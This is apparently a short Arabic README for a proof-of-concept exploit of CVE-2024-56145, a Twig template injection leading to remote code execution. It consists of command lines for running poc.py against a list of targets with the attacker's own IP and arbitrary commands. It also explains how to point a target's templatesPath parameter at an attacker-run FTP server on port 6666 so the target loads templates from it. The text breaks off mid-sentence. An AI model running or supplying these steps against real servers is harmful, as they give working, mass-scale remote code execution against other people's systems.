
CVE-2024-56145 SSTI إلى RCE - twig templates
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
يمكن استخدام أمر مخصص مثل python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i هو عنوان IP الخاص بك أو عنوان IP الخاص بـ VPS (استخدم ذلك عن طريق تنفيذ ipconfig / ifconfig).
مثل - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
والآن ماذا؟ لديك هدف معرض للخطر ولكنك تريد اللعب أكثر؟ لذا أضفت poc2.py وهو للاختبار اليدوي ضد الهدف، كيف تفعل ذلك؟ قم بـ
fuser -k 6666/tcp1. قم بتشغيل poc2.py (المنفذ 6666 سيبدأ كـ FTP).
2. افتح المتصفح على yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. سترى -

كتب بواسطة Chirag Artani (https://x.com/Chirag99Artani)